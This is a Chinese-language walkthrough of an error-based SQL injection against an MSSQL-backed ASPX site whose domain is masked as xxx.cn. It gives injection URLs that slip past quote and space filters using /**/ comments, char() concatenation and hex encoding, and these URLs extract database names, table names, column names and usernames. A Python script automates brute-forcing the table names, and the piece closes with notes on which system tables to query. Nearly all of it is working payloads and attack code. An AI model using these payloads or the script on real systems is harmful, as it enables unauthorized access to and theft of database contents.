0x00 爆数据库
过滤了单引号,空格等
利用char,0x绕过,注意%2b编码
http://www.xxx.cn/xxxInfo.aspx?Id=-111/**/and/**/1=convert(int,((select/**/name/**/from/**/master.dbo.sysdatabases/**/where/**/dbid=5)))–
0x01 爆表名
http://www.xxx.cn/xxxInfo.aspx?Id=-111/**/and/**/1=convert(int,(select/**/top/**/1/**/name/**/from/**/jy..sysobjects/**/where/**/xtype=0x75/**/and/**/name/**/not/**/in(char(111)%2bchar(111)%2bchar(111)%2bchar(111)%2bchar(111)%2bchar(111)%2bchar(111)%2bchar(111))))–
写个脚本跑表
#coding:utf-8 #Author:LSA import sys import requests from bs4 import BeautifulSoup import re headers = { 'Cookie': '', 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36' } global tables_name tables_name = "char(111)%2bchar(111)%2bchar(111)%2bchar(111)%2bchar(111)%2bchar(111)%2bchar(111)%2bchar(111)" #print tables_name def deal_table_name(table_name): xx = '' xxxx = '' for i in range(0,len(table_name)): xx = xx + str(ord(table_name[i])) + ' ' print xx xxx = xx[:-1].split(' ') print xxx for i in range(0,len(xxx)): xxxx = xxxx + 'char(' + xxx[i] + ')' + '%2b' return xxxx[:-3] def brute_tables(url): for i in range(0,300): url = 'http://www.xxx.cn/xxxInfo.aspx?Id=-111/**/and/**/1=convert(int,(select/**/top/**/1/**/name/**/from/**/jy..sysobjects/**/where/**/xtype=0x75/**/and/**/name/**/not/**/in(' + tables_name + ')))--' print url rsp = requests.get(url,headers=headers) soup = BeautifulSoup(rsp.text,"lxml") title = soup.title.string #print title table_name = re.findall(r"'(.*?)'",title) print table_name[0] table_name = deal_table_name(table_name[0]) print table_name global tables_name tables_name = tables_name + ',' + table_name #print tables_name print tables_name def main(url): brute_tables(url) if __name__ == '__main__': url = 'http://www.xxx.cn/xxxInfo.aspx?Id=-111/**/and/**/1=convert(int,(select/**/top/**/1/**/name/**/from/**/jy..sysobjects/**/where/**/xtype=0x75/**/and/**/name/**/not/**/in(' + tables_name + ')))--' main(url)
0x02 爆列名
http://www.xxx.cn/xxxInfo.aspx?Id=-111/**/and/**/1=convert(int,(select/**/top/**/1/**/COLUMN_NAME/**/from/**/jy.information_schema.columns/**/where/**/TABLE_NAME=char(85)%2bchar(115)%2bchar(101)%2bchar(114)%2bchar(115)/**/and/**/COLUMN_NAME/**/not/**/in(char(73)%2bchar(100))))–
0x03 爆数据
http://www.xxx.cn/xxxInfo.aspx?Id=-111/**/and/**/1=convert(int,(select/**/top/**/1/**/username/**/from/**/Users))–
0x04 结语
在注入中要灵活运用数据库自带的表,比如mssql的sysobjects,information_schema,mysql的information_schema,oracle的dual,user_tables,all_objects,user_tab_columns,all_tab_columns,all_tables等等。